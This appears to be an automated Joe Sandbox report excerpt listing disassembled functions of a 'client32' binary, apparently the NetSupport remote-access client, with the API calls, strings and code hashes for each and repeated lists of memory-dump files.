Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: e87fb6c6e91a16e04e5090b3c078ab349af3143ff8fed77f65b6fa69a6356d9e
Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
Opcode Fuzzy Hash: e87fb6c6e91a16e04e5090b3c078ab349af3143ff8fed77f65b6fa69a6356d9e
Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2

Function 110B3950 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
GetSystemMetrics.USER32(0000004C), ref: 110B39A7
GetSystemMetrics.USER32(0000004D), ref: 110B39AD
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveMetricsSystem$Enter
String ID:
API String ID: 4125181052-0
Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80

Function 11037D60 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 11037D9C
GetDlgItem.USER32(?,?), ref: 11037DBB
EnableWindow.USER32(00000000), ref: 11037DBE
GetDlgItem.USER32(?,?), ref: 11037DCB
ShowWindow.USER32(00000000), ref: 11037DCE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$Window$EnableShowText
String ID:
API String ID: 2998856390-0
Opcode ID: 6a5a0b3ba1467ff2c284a35fabc994209d91b47addf6a9717f90416f01fb02d5
Instruction ID: 613143f41e9fc75eb8a73e08d6fc7b0c40dae2de8c9c8905d469fc637a6c9323
Opcode Fuzzy Hash: 6a5a0b3ba1467ff2c284a35fabc994209d91b47addf6a9717f90416f01fb02d5
Instruction Fuzzy Hash: 8201927A60061A7FD7049B65DC8CDA7B76DEF84669B00C111FD2587604D631F900C7A0

Function 11091B00 Relevance: 7.6, APIs: 5, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A

Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4

TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
TranslateMessage.USER32(?), ref: 11091B51
DispatchMessageA.USER32(?), ref: 11091B5B
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
String ID:
API String ID: 754905447-0
Opcode ID: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
Instruction ID: 5368b2b879de48b6c9ab70957daae04249f1b13f85d80b649f1e25af9e3021ba
Opcode Fuzzy Hash: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
Instruction Fuzzy Hash: D901B172F4030FABE714DBA58C91FABB3ADEB84718F004568F628D6080F674E40587A4

Function 110B38D0 Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38DB
LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38FE
SetEvent.KERNEL32(?,?,?,?,1104697C,?,00000001), ref: 110B391A
LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3921
LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3937

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
Instruction ID: 98664a83d6f2f53ed4065ca3297c8b6ddfbfa19bf6bfb34fa0046f3acd8e92ae
Opcode Fuzzy Hash: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
Instruction Fuzzy Hash: 9101DB321402149FD32596D9D444BD7FBE8FF69725F00442BF5AAC6900D7B5E046CB51

Function 110F3880 Relevance: 7.5, APIs: 5, Instructions: 45pipesleepCOMMON

Download Yara Rule

APIs

SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F5EF9), ref: 110F3895
ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F5EF9), ref: 110F38AA
GetLastError.KERNEL32(?,?,110F5EF9), ref: 110F38B0
Sleep.KERNEL32(00000064,?,?,110F5EF9), ref: 110F38BF
SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F5EF9), ref: 110F38E2

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: NamedPipe$HandleState$ConnectErrorLastSleep
String ID:
API String ID: 218362120-0
Opcode ID: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
Instruction ID: 6745868c0ac614beeabaf6f2984982edca353f63092262b155279210f934f0d8
Opcode Fuzzy Hash: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
Instruction Fuzzy Hash: FE01A430A8431EBBF704CFD4CD86BA9B7ACEB48715F2040A9FD14D6580D7755D1187A1

Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 11171312

Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685

__getptd.LIBCMT ref: 11171329
__amsg_exit.LIBCMT ref: 11171337
__lock.LIBCMT ref: 11171347
__updatetlocinfoEx_nolock.LIBCMT ref: 1117135B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B

Function 110218D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11021932
IsWindowVisible.USER32(00000000), ref: 11021A03
wsprintfA.USER32 ref: 11021A47

Strings

%d,%d,%d,%d,%d,%d, xrefs: 11021A41

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$VisibleWindow
String ID: %d,%d,%d,%d,%d,%d
API String ID: 1671172596-1913222166
Opcode ID: 3272227fb7922b653542714aa73564b776349cef9ad10ef80c802daccd4013dd
Instruction ID: 6217bdbd462a20bf08026d4811e8c1ad77ae889b3603263953c56721c7b36dbb
Opcode Fuzzy Hash: 3272227fb7922b653542714aa73564b776349cef9ad10ef80c802daccd4013dd
Instruction Fuzzy Hash: AD519F74700215AFD710DB68CC90FAAB7F9BF88704F108699E65A9B391DB70ED45CBA0

Function 110EDD90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C

Part of subcall function 110ED670: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,110EE03F,?,?,?,?,?), ref: 110ED68D

_malloc.LIBCMT ref: 110EDE58

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

wsprintfA.USER32 ref: 110EDEA5
_free.LIBCMT ref: 110EDF29

Strings

%s\%s, xrefs: 110EDE9F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeapOpenQueryValue_free_mallocwsprintf
String ID: %s\%s
API String ID: 2497104544-4073750446
Opcode ID: 48186d437cd376cf29654bd5e6cdbd0be13cb134376f5259dafcc4e769bd5686
Instruction ID: 513ee1ad1fd7cee476722506ef88fee1d0f3ed1b23b0d64896100610e8ef207f
Opcode Fuzzy Hash: 48186d437cd376cf29654bd5e6cdbd0be13cb134376f5259dafcc4e769bd5686
Instruction Fuzzy Hash: E95144F5D0111D9FDB25CF59CC84BDEB3B8EB58314F4041E9E91967281E6706E848FA4

Function 11019B00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019C2A

Strings

..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 11019C35
vector<T> too long, xrefs: 11019C25
!"NOT IMPLEMENTED", xrefs: 11019C3A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
API String ID: 909987262-1355409292
Opcode ID: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
Instruction ID: fc840e911b847fc855133020e95c2a3ba51fe97c4fb46b87c4a8b304b90ffd87
Opcode Fuzzy Hash: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
Instruction Fuzzy Hash: DA41E875F002068FCB1CCE68CDD05AEB7E6F784219B648A3ED927C7688F635E9008751

Function 11041D90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 11041EE2
__CxxThrowException@8.LIBCMT ref: 11041EF0

Strings

Info. Set Volume, Locked %d, Volume %d, Max volume %d, xrefs: 11041E42
d, xrefs: 11041EF8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: Info. Set Volume, Locked %d, Volume %d, Max volume %d$d
API String ID: 3728558374-2833518301
Opcode ID: 8630f3c798bf079e95839b57f8ea8dec04ac0eecb6e16afab7c7ac139bfc52d6
Instruction ID: 0f683a3bce5a0428b995ca5eac0798808839c7159219b258e7a2dd55fca17d89
Opcode Fuzzy Hash: 8630f3c798bf079e95839b57f8ea8dec04ac0eecb6e16afab7c7ac139bfc52d6
Instruction Fuzzy Hash: 74419579E0450A9FCB04DFD5C890AFEF7B9FF48714F208259E415A7650EB346A49CBA0

Function 11117D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11117D2F
DeleteObject.GDI32(00000000), ref: 11117E53
GetTickCount.KERNEL32 ref: 11117E69

Strings

BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 11117D7E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$DeleteObject
String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
API String ID: 3011517232-3209293507
Opcode ID: 944e8c3b56f95bd01e50ac5f88558d500458916dbf0c32d7f5391c7a21eed665
Instruction ID: e4f0a2cb26c62c5ca2f78edd6de056f3b88c5100ff0dcd96c1b81cf77273a10d
Opcode Fuzzy Hash: 944e8c3b56f95bd01e50ac5f88558d500458916dbf0c32d7f5391c7a21eed665
Instruction Fuzzy Hash: 74414F72A00F199FDB28CF75CD856AFF7E1FB84219F104A3ED5AA96284EB3165408F01

Function 110774D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 11077511
CopyRect.USER32(?,00000004), ref: 1107753F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110774FE
